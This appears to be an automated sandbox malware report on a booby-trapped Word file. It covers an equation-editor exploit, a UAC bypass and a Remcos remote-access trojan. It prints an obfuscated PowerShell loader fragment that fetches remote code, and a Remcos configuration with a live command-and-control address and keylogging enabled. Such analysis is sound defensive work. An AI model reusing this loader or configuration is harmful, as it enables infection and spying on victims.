'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250Jys
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3916, TargetFilename: C:\Users\user\AppData\Local\Temp\rm3mxia0.zqh.ps1

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: 5F EE CB D7 76 BE 8E 23 5B C5 5A 49 A6 B5 C9 65 58 75 69 01 B6 BA 0E 48 17 3F A3 8F C5 FA A9 E4 AD C5 79 87 27 36 F8 02 13 CD 7D E9 B5 BE 7A D9 AD AB 3D 5F F0 45 76 6C 70 3E 82 98 D0 5A C5 B0 AC 24 54 0B C5 DF B9 BD BF 97 6A C1 9A 60 8E 61 45 D1 A0 35 06 CE 19 3D DA F5 C4 8A F2 6E 19 46 D9 01 8F 5B 21 99 99 6D 8B BD 46 AB 45 FA 37 8F 1A 3D , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2136, TargetObject: HKEY_CURRENT_USER\Software\Rmc-IAW1Y3\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T09:25:30.278282+020020204231Exploit Kit Activity Detected104.168.7.880192.168.2.2249171TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T09:25:30.278282+020020204251Exploit Kit Activity Detected104.168.7.880192.168.2.2249171TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T09:25:32.788889+020020365941Malware Command and Control Activity Detected192.168.2.2249172103.186.116.9958934TCP
                2024-10-01T09:25:34.988681+020020365941Malware Command and Control Activity Detected192.168.2.2249173103.186.116.9958934TCP
                2024-10-01T09:29:07.807333+020020365941Malware Command and Control Activity Detected192.168.2.2249175103.186.116.9958934TCP
                2024-10-01T09:29:08.088141+020020365941Malware Command and Control Activity Detected192.168.2.2249176103.186.116.9958934TCP
                2024-10-01T09:29:15.578303+020020365941Malware Command and Control Activity Detected192.168.2.2249177103.186.116.9958934TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T09:25:34.799977+020028033043Unknown Traffic192.168.2.2249174178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Found malware configuration
                Source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.186.116.99:58934:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IAW1Y3", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for submitted file
                Source: Scan Order and Specification 01-10- 2024.docxVirustotal: Detection: 7%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004338C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_db1466ac-9

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.7.8 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.drStream path '_1789258272/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407538 _wcslen,CoGetObject,13_2_00407538
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
